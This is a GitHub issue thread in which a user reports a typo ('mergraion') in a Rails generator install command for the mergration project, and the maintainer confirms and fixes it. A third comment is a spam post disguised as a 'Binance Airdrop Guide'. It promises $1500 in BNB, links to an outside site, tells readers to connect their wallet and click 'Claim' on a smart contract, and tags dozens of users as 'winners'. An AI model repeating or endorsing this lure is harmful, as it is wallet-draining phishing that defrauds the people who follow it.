### ISSUE TITLE
Typo in example

### ISSUE THREAD

**Issue by LE-HU** [38tter/mergration#11]
Is that a typo here?
![image](https://github.com/38tter/mergration/assets/19828138/09d745ca-cf14-47c6-b207-7aaf7e587a5f)
bin/rails generate **mergraion**:install

**Comment by 38tter** [comment]
Hi, Thanks for the report!
Yes, it's a typo, so I'll fix it soon!

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @nachii, @marshmell0w, @derekbtw, @DrAmirB, @htr-tech, @hook321, @denysonique, @phogatfirstgitrepo, @tifennf, @0x1100010010, @comfykayyy, @vict0rsch, @LaurenWags, @Pik-1, @styac, @HamSungJun, @xeoneux, @backham0429, @AmperAndSand, @espettia, @AeroOwl, @dhelbegor, @shadman1232, @fleetimee, @CHENBAE, @manayardmen, @timjab92, @DMWill, @tinylee, @radegeddon, @goldensquirrel11, @everbrez, @reza-ebrahimi, @ramirezjag00, @HeyJoplin, @samma835, @iower, @moarblur, @fbfeix, @suyanlong, @7x6r3n7o, @omrikiei, @astaruch, @fell-lucas, @hyperreal64, @whodef, @HashSalmon, @rajib-raiyat, @josepowera, @Mr-Skully

**Comment by 38tter** [comment]
I finally corrected the typo, so I'll close this issue 👍 
Thanks for reporting, @LE-HU
